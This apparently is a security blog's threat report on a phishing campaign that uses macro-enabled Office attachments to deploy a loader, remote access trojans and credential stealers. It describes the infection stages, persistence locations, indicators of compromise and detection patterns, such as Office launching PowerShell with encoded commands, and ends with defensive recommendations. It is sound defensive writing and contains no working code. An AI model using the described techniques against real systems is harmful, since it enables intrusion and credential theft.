One Click Is Enough: Commodity Loader Emails Quietly Opening the Door to Full System Takeovers

Aegiron 9 mins0

Executive Summary

A large-scale malicious email campaign, now commonly referred to as the Commodity Loader Campaign, has been actively targeting organizations across multiple industries using weaponized Office documents as the initial infection vector. The campaign was publicly reported in early January 2026 and remains active.

The attack does not rely on exploiting software vulnerabilities. Instead, it abuses trusted business file formats, user interaction, and built-in Windows tools to quietly deploy a malware loader that acts as a gateway for additional payloads, including remote access trojans and credential-stealing malware.

What makes this campaign particularly dangerous is its simplicity, reliability, and flexibility. The loader itself is not the end goal. It exists solely to give attackers persistent access and the ability to deploy whatever malware best suits their objective.

What Happened

Organizations began reporting suspicious activity originating from email attachments that appeared to be normal business documents. Employees received emails containing invoices, shipping documents, payment confirmations, or internal-looking reports.

Once opened, the document displayed a familiar message prompting the user to “Enable Editing” or “Enable Content” to view the file correctly. After the user complied, malicious code embedded inside the document executed silently in the background.

Within seconds, the infected system established outbound communication with attacker-controlled infrastructure and downloaded the Commodity Loader payload. From there, the attackers were able to deploy additional malware, steal credentials, and maintain access without immediately alerting defenders.

Initial Attack Vector

Primary Vector:
Malicious email attachments

Common Attachment Types Observed:

  • .docm (macro-enabled Word documents)
  • .xlsm (macro-enabled Excel spreadsheets)
  • .docx files containing embedded scripts
  • .zip archives containing weaponized Office files
  • .html or .htm files masquerading as documents

Email Characteristics:

  • Sent from compromised or spoofed business accounts
  • Often contain minimal spelling or grammar errors
  • Designed to look routine and non-urgent
  • Frequently reference real-world business processes

Infection Chain

Stage 1 – Document Execution

When the document is opened:

  • A macro or embedded script checks whether macros are enabled
  • If disabled, the user is prompted to enable them
  • Once enabled, the malicious script runs automatically

Stage 2 – Script Execution

The macro launches:

  • PowerShell
  • Windows Script Host (wscript.exe or cscript.exe)
  • mshta.exe in some cases

The script is usually obfuscated and Base64-encoded to avoid detection.

Stage 3 – Loader Deployment

The script:

  • Downloads or reconstructs the Commodity Loader in memory
  • Writes minimal or no files to disk
  • Establishes persistence mechanisms

Stage 4 – Command and Control Communication

The loader:

  • Contacts attacker-controlled servers over HTTP or HTTPS
  • Uses encrypted or encoded traffic
  • Waits for instructions or additional payloads

Commodity Loader – Technical Overview

Commodity Loader is a lightweight malware framework shared among multiple threat groups. It is not tied to a single criminal operation.

Key Capabilities:

  • In-memory execution
  • Payload delivery and execution
  • Environment profiling
  • Persistence installation
  • Encrypted C2 communications
  • Anti-analysis checks

The loader is modular, meaning attackers can swap payloads without changing the initial delivery method.

Payloads Delivered

1. Remote Access Trojans (RATs)

Used to:

  • Remotely control infected systems
  • Execute arbitrary commands
  • Capture screenshots
  • Log keystrokes
  • Upload and download files

2. Information Stealers

Designed to extract:

  • Browser credentials
  • Saved passwords
  • Authentication cookies
  • Email account data
  • VPN credentials
  • Cryptocurrency wallet data

3. Secondary Loaders

Used to:

  • Maintain long-term access
  • Deliver updated malware
  • Pivot to additional systems

No confirmed ransomware deployment has been observed in this campaign so far, but the loader architecture could support it.

Persistence Mechanisms Observed

  • Registry Run keys:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled tasks with random or system-like names
  • Startup folder shortcuts
  • DLL side-loading in user-writable directories

Indicators of Compromise (IOCs)

File System Indicators

  • Office documents with unexpected macros
  • Newly created files in:
    • %AppData%\Roaming\
    • %LocalAppData%\
    • %Temp%\
  • Files with random names such as:
    • update32.dll
    • winservice.exe
    • syscache.tmp

Process Indicators

  • WINWORD.EXE or EXCEL.EXE spawning:
    • powershell.exe
    • cmd.exe
    • wscript.exe
    • mshta.exe
  • PowerShell launched with:
    • -EncodedCommand
    • Hidden window flags

Network Indicators

  • Outbound traffic to:
    • Recently registered domains
    • Domains with no business relevance
  • Repeated beaconing every few minutes
  • Encrypted HTTP POST requests with small payload sizes

Behavioral Indicators

  • Office applications initiating network connections
  • Scheduled tasks created shortly after document execution
  • Unusual PowerShell execution from user context

How This Attack Can Be Identified

Email-Level Detection

  • Macro-enabled documents sent from external senders
  • HTML attachments disguised as invoices
  • ZIP files containing a single Office document

Endpoint Detection

  • Alert on Office spawning scripting engines
  • Monitor PowerShell with encoded commands
  • Detect suspicious scheduled task creation

Network Detection

  • Look for low-volume, high-frequency outbound connections
  • Identify traffic to newly registered domains
  • Monitor unusual HTTPS traffic from user workstations

User Behavior Signals

  • Reports of documents requesting macro enablement
  • Systems slowing down shortly after opening documents
  • Unexpected credential lockouts or account misuse

Impacted Industries

The campaign has impacted a wide range of industries, including:

  • Manufacturing
  • Logistics and transportation
  • Financial services
  • Healthcare
  • Retail
  • Professional services
  • Small and medium-sized businesses

No specific organization size or geography appears to be exclusively targeted.

Why This Campaign Is Effective

  • Relies on user trust, not software flaws
  • Uses legitimate Windows tools
  • Avoids dropping obvious malware files
  • Easily adaptable for different payloads
  • Difficult to block without behavioral controls

Defensive Recommendations

  • Disable Office macros by default
  • Block Office apps from launching PowerShell
  • Enforce application control policies
  • Strengthen email attachment filtering
  • Monitor PowerShell and script activity
  • Conduct regular phishing awareness training

Final Takeaway

The Commodity Loader campaign is a reminder that modern cyber threats do not always rely on advanced exploits. Instead, attackers succeed by blending into normal business activity and abusing tools that organizations already trust.

Until organizations fully address macro abuse, script monitoring, and user behavior risks, campaigns like this will continue to be effective.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.